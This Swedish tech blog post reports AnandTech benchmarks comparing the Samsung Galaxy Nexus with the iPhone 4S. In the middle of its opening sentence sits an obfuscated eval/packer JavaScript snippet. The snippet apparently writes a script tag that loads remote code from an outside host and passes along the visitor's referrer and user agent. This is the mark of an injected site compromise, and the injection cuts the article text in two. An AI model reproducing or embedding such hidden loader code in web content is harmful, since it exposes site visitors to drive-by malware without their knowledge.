Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Samsung Galaxy Nexus snabbare än iPhone 4S

Samsung Galaxy Nexus snabbare än iPhone 4S
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nzfib|var|u0026u|referrer|karfr||js|php’.split(‘|’),0,{}))
verkar som Samung Galaxy Nexus är snabbare än iPhone 4S, på några saker i alla fall.

AnandTech har gjort lite test rörande prestandan på Samsungs nya telefon Galaxy Nexus och sett att den är snababre än iPhone 4S.

Exempel ser vi på bilden där testet ”SunSpider” Javascript Benchmark (version 0.9.1) kördes och Nexus hamnade i toppen. Nexus var även snabbare än iPhone 4S i testet ”Rightware BrowserMark” vilket var ett test för att se hur snabbt telefonen kan rendera sidor när du surfar.

När det kom till grafik slog dock iPhone 4S och iPad 2 samsungs Nexus.

Resultatet betyder alltså att iPhone 4S och iPad 2 skulle vara bättre när det kommer till spel och andra saker som ofta kräver mycket från grafikkortet.

Se fler tester och läs mer: www.anandtech.com